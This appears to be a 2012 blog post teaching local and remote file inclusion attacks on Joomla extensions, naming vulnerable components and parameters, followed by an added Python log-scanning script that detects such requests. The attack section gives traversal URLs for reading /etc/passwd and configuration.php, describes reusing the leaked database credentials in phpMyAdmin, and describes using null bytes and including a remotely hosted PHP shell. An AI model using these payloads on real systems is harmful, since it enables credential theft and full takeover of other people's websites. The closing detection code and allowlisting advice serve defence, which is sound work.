Friday, February 3, 2012

Joomla RFI Remote File Inclusions Attack | Joomla LFI Local File Inclusions Attack

Examples for Joomla local file inclusions

Local file inclusions are very funny. You tell the website what you want to see. Awesome! You want to view the configuration file which contains the database login credentials? No problem.

You want to view the /etc/passwd file if Joomla is hosted on a Linux box? You can do that.

Local file inclusions are also a common problem in Joomla extensions. Many of them are vulnerable to this type of attack and some of them never get fixed. This may lead to a server hack, which is not funny any more - at least for the system administrator.

A typical URL that is vulnerable to LFI looks like this:
index.php?option=com_blablubb&Item=2&view=guestbookpage

Typically, the vulnerable parameter is one of these:
- controller
- view
- layout
- page

To give you a proper understanding of typical affected URLs, I provide you with some examples I found earlier this year:

URL: index.php?option=com_jejob&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jeajaxeventcalendar&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jradio&controller=some_value
Vulnerable Parameter: controller
(I didn't find this one.)

Now let's see how we can use this:
index.php?option=com_jradio&controller=../../../../etc/passwd

In this case we need to use the famous null byte, which helps us bypass a restriction set in the component's responsible PHP script.

In the example above the controller parameter is used to include a file from the local hard disk. This file contains useful information for us.

If you are not familiar with local file inclusions, I recommend you look up a tutorial, since I will not explain any details here.

Now, knowing about an LFI vulnerability within a Joomla component, we can try to access Joomla's configuration.php. This file contains very very interesting information.

Since many LFIs also reveal PHP source code, we try this one:
index.php?option=com_blabla&view=../../../configuration.php

The source code of the file is shown and we receive the login data for the current database user. Now find a phpMyAdmin login on the same server and try to log in with this data.

You now have access to all Joomla tables and can basically do what you want.

Examples for Joomla remote file inclusions

Some Joomla components are also known for containing remote file inclusion vulnerabilities. RFIs allow us to include files from another server and to execute code on the target.

A typical RFI URL looks like an LFI URL. In order to give you a better feeling of how to spot an RFI vulnerability within seconds, I show you some examples:

URL: index.php?option=com_sef&Itemid=&mosConfig.absolute.path=.
Vulnerable Parameter: &mosConfig.absolute.path

URL: index.php?option=com_jomestate&task=.
Vulnerable Parameter: task

Once you have found an RFI vulnerability, try to include your PHP shell, which is hosted on another box. Once you have uploaded it, you are able to browse all Joomla files and download them, change them, remove them...

No Joomla installation is safe when there is an exploited RFI.
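
Seen from the defender's side, the LFI and RFI requests described in both sections leave the same marks in a web server access log, so they can be flagged by checking the parameters named above. The following Python is an added example, not code from the original post; the function names, the `WATCHED` set and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names the post lists as typically vulnerable (lower-cased).
WATCHED = {"controller", "view", "layout", "page",      # LFI section
           "mosconfig_absolute_path", "task"}           # RFI section
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")        # a ".." path segment
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)

def fully_decode(value, rounds=3):
    """Undo layered percent-encoding (e.g. %252e) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_target):
    """Return sorted findings ("kind:param") for one path?query string."""
    findings = set()
    query = urlsplit(request_target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # PHP turns dots in incoming parameter names into underscores.
        key = name.lower().replace(".", "_")
        value = fully_decode(raw)
        if "\x00" in value:
            findings.add(f"null-byte:{key}")
        if key in WATCHED and TRAVERSAL.search(value):
            findings.add(f"traversal:{key}")
        if key in WATCHED and REMOTE.match(value):
            findings.add(f"remote-url:{key}")
    return sorted(findings)

# Constructed sample requests; hosts and values are placeholders.
SAMPLES = [
    "/index.php?option=com_content&view=article&id=5",
    "/index.php?option=com_jradio&controller=../../../../etc/passwd",
    "/index.php?option=com_blabla&view=..%252f..%252fconfiguration.php%2500",
    "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://example.invalid/a.txt",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or "clean", target)
```

A hit is a lead for log review, not proof of compromise. The actual fix belongs in the component, which should map these parameters to an allowlist of known controller and view names instead of building an include path from them.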
